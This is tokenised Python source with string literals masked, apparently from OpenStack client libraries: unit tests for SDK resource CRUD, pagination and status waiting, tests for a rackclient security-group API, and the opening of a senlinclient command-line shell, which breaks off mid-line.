head = mock . Mock ( return_value = self . response ) <EOL> def _test_create ( self , requires_id = False , prepend_key = False ) : <EOL> if not requires_id : <EOL> self . sot . id = None <EOL> result = self . sot . create ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( <EOL> requires_id = requires_id , prepend_key = prepend_key ) <EOL> if requires_id : <EOL> self . session . put . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> else : <EOL> self . session . post . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_create_with_id ( self ) : <EOL> self . _test_create ( requires_id = True , prepend_key = True ) <EOL> def test_create_without_id ( self ) : <EOL> self . _test_create ( requires_id = False , prepend_key = True ) <EOL> def test_get ( self ) : <EOL> result = self . sot . get ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_head ( self ) : <EOL> result = self . sot . head ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . head . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def _test_update ( self , patch_update = False ) : <EOL> self . sot . patch_update = patch_update <EOL> self . sot . _body = mock . Mock ( ) <EOL> self . sot . _body . dirty = mock . Mock ( return_value = { "<STR_LIT:x>" : "<STR_LIT:y>" } ) <EOL> result = self . sot . update ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( prepend_key = True ) <EOL> if patch_update : <EOL> self . session . patch . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> else : <EOL> self . session . put . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_update_put ( self ) : <EOL> self . _test_update ( patch_update = False ) <EOL> def test_update_patch ( self ) : <EOL> self . _test_update ( patch_update = True ) <EOL> def test_update_not_dirty ( self ) : <EOL> self . sot . _body = mock . Mock ( ) <EOL> self . sot . _body . dirty = dict ( ) <EOL> self . sot . _header = mock . Mock ( ) <EOL> self . sot . _header . dirty = dict ( ) <EOL> result = self . sot . update ( self . session ) <EOL> self . assertEqual ( result , self . sot ) <EOL> self . session . put . assert_not_called ( ) <EOL> def test_delete ( self ) : <EOL> result = self . sot . delete ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . delete . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . sot . _translate_response . assert_called_once_with ( <EOL> self . response , has_body = False ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_list_empty_response ( self ) : <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = [ ] <EOL> self . session . get . return_value = mock_response <EOL> result = list ( self . sot . list ( self . session ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( [ ] , result ) <EOL> def test_list_one_page_response_paginated ( self ) : <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . side_effect = [ [ { "<STR_LIT:id>" : id_value } ] , <EOL> [ ] ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = True ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { } <EOL> self . session . get . call_args_list [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { "<STR_LIT>" : id_value } <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_one_page_response_not_paginated ( self ) : <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = [ { "<STR_LIT:id>" : id_value } ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = False ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_one_page_response_resources_key ( self ) : <EOL> key = "<STR_LIT>" <EOL> class Test ( self . test_class ) : <EOL> resources_key = key <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = { key : [ { "<STR_LIT:id>" : id_value } ] } <EOL> self . session . get . return_value = mock_response <EOL> sot = Test ( ) <EOL> results = list ( sot . list ( self . session ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_multi_page_response_not_paginated ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . side_effect = [ [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } ] , <EOL> [ { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = False ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( ids [ <NUM_LIT:0> ] , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_query_params ( self ) : <EOL> id = <NUM_LIT:1> <EOL> qp = "<STR_LIT>" <EOL> qp_name = "<STR_LIT>" <EOL> uri_param = "<STR_LIT>" <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . side_effect = [ [ { "<STR_LIT:id>" : id } ] , <EOL> [ ] ] <EOL> self . session . get . return_value = mock_response <EOL> class Test ( self . test_class ) : <EOL> _query_mapping = resource2 . QueryParameters ( query_param = qp_name ) <EOL> base_path = "<STR_LIT>" <EOL> something = resource2 . URI ( "<STR_LIT>" ) <EOL> results = list ( Test . list ( self . session , paginated = True , <EOL> query_param = qp , something = uri_param ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { qp_name : qp } <EOL> self . assertEqual ( self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> Test . base_path % { "<STR_LIT>" : uri_param } ) <EOL> def test_list_multi_page_response_paginated ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> resp1 = mock . Mock ( ) <EOL> resp1 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } ] <EOL> resp2 = mock . Mock ( ) <EOL> resp2 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] <EOL> resp3 = mock . Mock ( ) <EOL> resp3 . json . return_value = [ ] <EOL> self . session . get . side_effect = [ resp1 , resp2 , resp3 ] <EOL> results = self . sot . list ( self . session , paginated = True ) <EOL> result0 = next ( results ) <EOL> self . assertEqual ( result0 . id , ids [ <NUM_LIT:0> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> result1 = next ( results ) <EOL> self . assertEqual ( result1 . id , ids [ <NUM_LIT:1> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:1> } ) <EOL> self . assertRaises ( StopIteration , next , results ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } ) <EOL> def test_list_multi_page_early_termination ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> resp1 = mock . Mock ( ) <EOL> resp1 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } , { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] <EOL> resp2 = mock . Mock ( ) <EOL> resp2 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:2> ] } ] <EOL> self . session . get . side_effect = [ resp1 , resp2 ] <EOL> results = self . sot . list ( self . session , paginated = True ) <EOL> result0 = next ( results ) <EOL> self . assertEqual ( result0 . id , ids [ <NUM_LIT:0> ] ) <EOL> result1 = next ( results ) <EOL> self . assertEqual ( result1 . id , ids [ <NUM_LIT:1> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> result2 = next ( results ) <EOL> self . assertEqual ( result2 . id , ids [ <NUM_LIT:2> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : <NUM_LIT:2> } ) <EOL> self . assertRaises ( StopIteration , next , results ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( self . session . get . call_args_list ) ) <EOL> class TestResourceFind ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestResourceFind , self ) . setUp ( ) <EOL> self . result = <NUM_LIT:1> <EOL> class Base ( resource2 . Resource ) : <EOL> @ classmethod <EOL> def existing ( cls , ** kwargs ) : <EOL> raise exceptions . NotFoundException <EOL> @ classmethod <EOL> def list ( cls , session ) : <EOL> return None <EOL> class OneResult ( Base ) : <EOL> @ classmethod <EOL> def _get_one_match ( cls , * args ) : <EOL> return self . result <EOL> class NoResults ( Base ) : <EOL> @ classmethod <EOL> def _get_one_match ( cls , * args ) : <EOL> return None <EOL> self . no_results = NoResults <EOL> self . one_result = OneResult <EOL> def test_find_short_circuit ( self ) : <EOL> value = <NUM_LIT:1> <EOL> class Test ( resource2 . Resource ) : <EOL> @ classmethod <EOL> def existing ( cls , ** kwargs ) : <EOL> mock_match = mock . Mock ( ) <EOL> mock_match . get . return_value = value <EOL> return mock_match <EOL> result = Test . find ( "<STR_LIT>" , "<STR_LIT:name>" ) <EOL> self . assertEqual ( result , value ) <EOL> def test_no_match_raise ( self ) : <EOL> self . assertRaises ( exceptions . ResourceNotFound , self . no_results . find , <EOL> "<STR_LIT>" , "<STR_LIT:name>" , ignore_missing = False ) <EOL> def test_no_match_return ( self ) : <EOL> self . assertIsNone ( <EOL> self . no_results . find ( "<STR_LIT>" , "<STR_LIT:name>" , ignore_missing = True ) ) <EOL> def test_find_result ( self ) : <EOL> self . assertEqual ( self . result , self . one_result . find ( "<STR_LIT>" , "<STR_LIT:name>" ) ) <EOL> def test_match_empty_results ( self ) : <EOL> self . assertIsNone ( resource2 . Resource . _get_one_match ( "<STR_LIT:name>" , [ ] ) ) <EOL> def test_no_match_by_name ( self ) : <EOL> the_name = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . name = the_name <EOL> result = resource2 . Resource . _get_one_match ( "<STR_LIT>" , [ match ] ) <EOL> self . assertIsNone ( result , match ) <EOL> def test_single_match_by_name ( self ) : <EOL> the_name = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . name = the_name <EOL> result = resource2 . Resource . _get_one_match ( the_name , [ match ] ) <EOL> self . assertIs ( result , match ) <EOL> def test_single_match_by_id ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . id = the_id <EOL> result = resource2 . Resource . _get_one_match ( the_id , [ match ] ) <EOL> self . assertIs ( result , match ) <EOL> def test_single_match_by_alternate_id ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> other_id = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> match = Test ( other_id = the_id ) <EOL> result = Test . _get_one_match ( the_id , [ match ] ) <EOL> self . assertIs ( result , match ) <EOL> def test_multiple_matches ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . id = the_id <EOL> self . assertRaises ( <EOL> exceptions . DuplicateResource , <EOL> resource2 . Resource . _get_one_match , the_id , [ match , match ] ) <EOL> class TestWaitForStatus ( base . TestCase ) : <EOL> def test_immediate_status ( self ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> resource . status = status <EOL> result = resource2 . wait_for_status ( "<STR_LIT>" , resource , status , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_status_match ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , status ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> result = resource2 . wait_for_status ( "<STR_LIT>" , resource , status , <EOL> None , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_status_fails ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> failure = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" , failure , failure , failure ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceFailure , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , status , [ failure ] , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_timeout ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" ] * <NUM_LIT:7> <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , status , None , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> def test_no_sleep ( self ) : <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , "<STR_LIT:status>" , None , <NUM_LIT:0> , - <NUM_LIT:1> ) <EOL> class TestWaitForDelete ( base . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_success ( self , mock_sleep ) : <EOL> resource = mock . Mock ( ) <EOL> resource . get . side_effect = [ None , None , exceptions . NotFoundException ] <EOL> result = resource2 . wait_for_delete ( "<STR_LIT>" , resource , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_timeout ( self , mock_sleep ) : <EOL> resource = mock . Mock ( ) <EOL> resource . get . side_effect = [ None , None , None ] <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_delete , <EOL> "<STR_LIT>" , resource , <NUM_LIT:1> , <NUM_LIT:3> ) </s>
<s> from rackclient import exceptions as exc <EOL> from rackclient . tests import utils <EOL> from rackclient . tests . v1 import fakes <EOL> from rackclient . v1 import securitygroups <EOL> class SecuritygroupsTest ( utils . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SecuritygroupsTest , self ) . setUp ( ) <EOL> self . cs = fakes . FakeClient ( ) <EOL> self . securitygroup_type = securitygroups . Securitygroup <EOL> self . gid = '<STR_LIT>' <EOL> self . user_id = '<STR_LIT>' <EOL> self . project_id = '<STR_LIT>' <EOL> def test_list ( self ) : <EOL> securitygroups = self . cs . securitygroups . list ( self . gid ) <EOL> self . cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % self . gid ) <EOL> for securitygroup in securitygroups : <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_get ( self ) : <EOL> securitygroup_id = '<STR_LIT>' <EOL> securitygroup = self . cs . securitygroups . get ( self . gid , securitygroup_id ) <EOL> self . cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) ) <EOL> self . assertEqual ( self . gid , securitygroup . gid ) <EOL> self . assertEqual ( self . user_id , securitygroup . user_id ) <EOL> self . assertEqual ( self . project_id , securitygroup . project_id ) <EOL> self . assertEqual ( securitygroup_id , securitygroup . securitygroup_id ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . neutron_securitygroup_id ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . name ) <EOL> self . assertEqual ( True , securitygroup . is_default ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . status ) <EOL> def _create_body ( self , name , is_default , rules ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : is_default , <EOL> '<STR_LIT>' : rules <EOL> } <EOL> } <EOL> def test_create ( self ) : <EOL> name = '<STR_LIT>' <EOL> is_default = True <EOL> rules = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> securitygroup = self . cs . securitygroups . create ( self . gid , name , is_default , rules ) <EOL> body = self . _create_body ( name , is_default , rules ) <EOL> self . cs . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' % self . gid , body ) <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_create_invalid_parameters ( self ) : <EOL> name = '<STR_LIT>' <EOL> rules = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> self . assertRaises ( exc . CommandError , self . cs . securitygroups . create , <EOL> self . gid , name , '<STR_LIT>' , rules ) <EOL> rules = { } <EOL> self . assertRaises ( exc . CommandError , self . cs . securitygroups . create , <EOL> self . gid , name , True , rules ) <EOL> def _update_body ( self , is_default ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : is_default <EOL> } <EOL> } <EOL> def test_update ( self ) : <EOL> is_default = True <EOL> securitygroup_id = '<STR_LIT>' <EOL> securitygroup = self . cs . securitygroups . update ( self . gid , securitygroup_id , is_default ) <EOL> body = self . _update_body ( is_default ) <EOL> self . cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) , body ) <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_update_invalid_parameters ( self ) : <EOL> is_default = '<STR_LIT>' <EOL> securitygroup_id = '<STR_LIT>' <EOL> self . assertRaises ( exc . CommandError , self . cs . securitygroups . update , <EOL> self . gid , securitygroup_id , is_default ) <EOL> def test_delete ( self ) : <EOL> securitygroup_id = '<STR_LIT>' <EOL> self . cs . securitygroups . delete ( self . gid , securitygroup_id ) <EOL> self . cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import argparse <EOL> import logging <EOL> import sys <EOL> from oslo_utils import encodeutils <EOL> from oslo_utils import importutils <EOL> import six <EOL> import senlinclient <EOL> from senlinclient import cliargs <EOL> from senlinclient import client as senlin_client <EOL> from senlinclient . common import exc <EOL> from senlinclient . common . i18n import _ <EOL> from senlinclient . common import utils <EOL> osprofiler_profiler = importutils . try_import ( "<STR_LIT>" ) <EOL> USER_AGENT = '<STR_LIT>' <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class HelpFormatter ( argparse . HelpFormatter ) : <EOL> def start_section ( self , heading ) : <EOL> heading = '<STR_LIT>' % ( heading [ <NUM_LIT:0> ] . upper ( ) , heading [ <NUM_LIT:1> : ] ) <EOL> super ( HelpFormatter , self ) . start_section ( heading ) <EOL> class SenlinShell ( object ) : <EOL> def _setup_logging ( self , debug ) : <EOL> log_lvl = logging . DEBUG if debug else logging . WARNING <EOL> logging . basicConfig ( format = "<STR_LIT>" , <EOL> level = log_lvl ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . WARNING ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . WARNING ) <EOL> def _setup_verbose ( self , verbose ) : <EOL> if verbose : <EOL> exc . verbose = <NUM_LIT:1> <EOL> def _find_actions ( self , subparsers , actions_module ) : <EOL> for attr in ( a for a in dir ( actions_module ) if a . startswith ( '<STR_LIT>' ) ) : <EOL> command = attr [ <NUM_LIT:3> : ] . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> callback = getattr ( actions_module , attr ) <EOL> desc = callback . __doc__ or '<STR_LIT>' <EOL> help = desc . strip ( ) . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:0> ] <EOL> arguments = getattr ( callback , '<STR_LIT>' , [ ] ) <EOL> subparser = subparsers . add_parser ( command , <EOL> help = help , <EOL> description = desc , <EOL> add_help = False , <EOL> formatter_class = HelpFormatter ) <EOL> subparser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> help = argparse . SUPPRESS ) <EOL> for ( args , kwargs ) in arguments : <EOL> subparser . add_argument ( * args , ** kwargs ) <EOL> subparser . set_defaults ( func = callback ) <EOL> self . subcommands [ command ] = subparser <EOL> def do_bash_completion ( self , args ) : <EOL> """<STR_LIT>""" <EOL> commands = set ( ) <EOL> options = set ( ) <EOL> for sc_str , sc in self . subcommands . items ( ) : <EOL> if sc_str == '<STR_LIT>' or sc_str == '<STR_LIT>' : <EOL> continue <EOL> commands . add ( sc_str ) <EOL> for option in list ( sc . _optionals . _option_string_actions ) : <EOL> options . add ( option ) <EOL> print ( '<STR_LIT:U+0020>' . join ( commands | options ) ) <EOL> def add_profiler_args ( self , parser ) : <EOL> if osprofiler_profiler : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def _add_bash_completion_subparser ( self , subparsers ) : <EOL> subparser = subparsers . add_parser ( '<STR_LIT>' , <EOL> add_help = False , <EOL> formatter_class = HelpFormatter ) <EOL> subparser . set_defaults ( func = self . do_bash_completion ) <EOL> self . subcommands [ '<STR_LIT>' ] = subparser <EOL> def get_subcommand_parser ( self , base_parser , version ) : <EOL> parser = base_parser <EOL> self . subcommands = { } <EOL> subparsers = parser . add_subparsers ( metavar = '<STR_LIT>' ) <EOL> submodule = utils . import_versioned_module ( version , '<STR_LIT>' ) <EOL> self . _find_actions ( subparsers , submodule ) <EOL> self . _find_actions ( subparsers , self ) <EOL> self . _add_bash_completion_subparser ( subparsers ) <EOL> return parser <EOL> @ utils . arg ( '<STR_LIT>' , metavar = '<STR_LIT>' , nargs = '<STR_LIT:?>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> def do_help ( self , args ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( args , '<STR_LIT>' , None ) : <EOL> if args . command in self . subcommands : <EOL> self . subcommands [ args . command ] . print_help ( ) <EOL> else : <EOL> raise exc . CommandError ( "<STR_LIT>" % <EOL> args . command ) <EOL> else : <EOL> self . parser . print_help ( ) <EOL> def _check_identity_arguments ( self , args ) : <EOL> if not args . auth_url : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . CommandError ( msg ) <EOL> if not ( args . username or args . user_id or args . token ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . CommandError ( msg ) <EOL> if ( args . username and args . user_id ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> print ( _ ( '<STR_LIT>' ) % msg ) <EOL> if '<STR_LIT>' in args . auth_url : <EOL> if ( args . username and not args . user_id ) : <EOL> if not ( args . user_domain_id or args . user_domain_name ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . CommandError ( msg ) <EOL> if ( args . username or args . user_id ) and not ( args . password ) : <EOL> msg = _ ( '<STR_LIT>' ) % ( <EOL> args . username or args . user_id ) <EOL> raise exc . CommandError ( msg ) <EOL> if ( not ( args . project_id or args . project_name or args . tenant_id <EOL> or args . tenant_name ) ) : <EOL> if not ( args . user_id ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . CommandError ( msg ) <EOL> else : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> print ( _ ( '<STR_LIT>' ) % msg ) <EOL> if ( ( args . project_id or args . tenant_id ) and <EOL> ( args . project_name or args . tenant_name ) ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> print ( _ ( '<STR_LIT>' ) % msg ) <EOL> if '<STR_LIT>' in args . auth_url : <EOL> if ( not ( args . project_id or args . tenant_id ) and <EOL> ( args . project_name or args . tenant_name ) and <EOL> not ( args . project_domain_id or args . project_domain_name ) ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . CommandError ( msg ) <EOL> def _setup_senlin_client ( self , api_ver , args ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { <EOL> '<STR_LIT>' : args . auth_plugin or '<STR_LIT:password>' , <EOL> '<STR_LIT>' : args . auth_url , <EOL> '<STR_LIT>' : args . project_name or args . tenant_name , <EOL> '<STR_LIT>' : args . project_id or args . tenant_id , <EOL> '<STR_LIT>' : args . domain_name , <EOL> '<STR_LIT>' : args . domain_id , <EOL> '<STR_LIT>' : args . project_domain_name , <EOL> '<STR_LIT>' : args . project_domain_id , <EOL> '<STR_LIT>' : args . user_domain_name , <EOL> '<STR_LIT>' : args . user_domain_id , <EOL> '<STR_LIT:username>' : args . username , <EOL> '<STR_LIT>' : args . user_id , <EOL> '<STR_LIT:password>' : args . password , <EOL> '<STR_LIT>' : args . verify , <EOL> '<STR_LIT>' : args . token , <EOL> '<STR_LIT>' : args . trust_id , <EOL> } <EOL> return senlin_client . Client ( '<STR_LIT:1>' , args . user_preferences , USER_AGENT , <EOL> ** kwargs ) <EOL> def main ( self , argv ) : <EOL> parser = argparse . ArgumentParser ( <EOL> prog = '<STR_LIT>' , <EOL> description = __doc__ . strip ( ) , <EOL> epilog = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> add_help = False , <EOL> formatter_class = HelpFormatter , <EOL> ) <EOL> cliargs . add_global_args ( parser , version = senlinclient . __version__ ) <EOL> cliargs . add_global_identity_args ( parser ) <EOL> self . add_profiler_args ( parser ) <EOL> base_parser = parser <EOL> ( options , args ) = base_parser . parse_known_args ( argv ) <EOL> self . _setup_logging ( options . debug ) <EOL> self . _setup_verbose ( options . verbose 